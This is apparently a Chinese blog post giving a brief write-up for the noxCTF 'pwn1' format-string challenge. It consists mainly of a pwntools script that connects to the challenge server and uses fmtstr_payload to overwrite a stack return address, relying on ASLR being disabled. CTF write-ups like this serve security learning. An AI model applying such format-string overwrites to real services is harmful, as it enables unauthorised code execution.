1. 程式人生 > >noxCTF-pwn1-格式化字串

noxCTF-pwn1-格式化字串

格式化字串

額額部落格爆炸。。之前寫的都沒了懶得再寫一遍了太坑了這部落格就發個wp吧,過程就是遠端洩漏ret地址,因為沒有開alsr

from pwn import *

context.log_level='debug'
elf = ELF('./believeMe.dms')
libc = elf.libc
p = remote('18.223.228.52',13337)
#p = process('./believeMe.dms')
payload = fmtstr_payload(9,{0xffffdd2c:0x804867b},write_size='short')

p.sendline(payload)


p.interactive()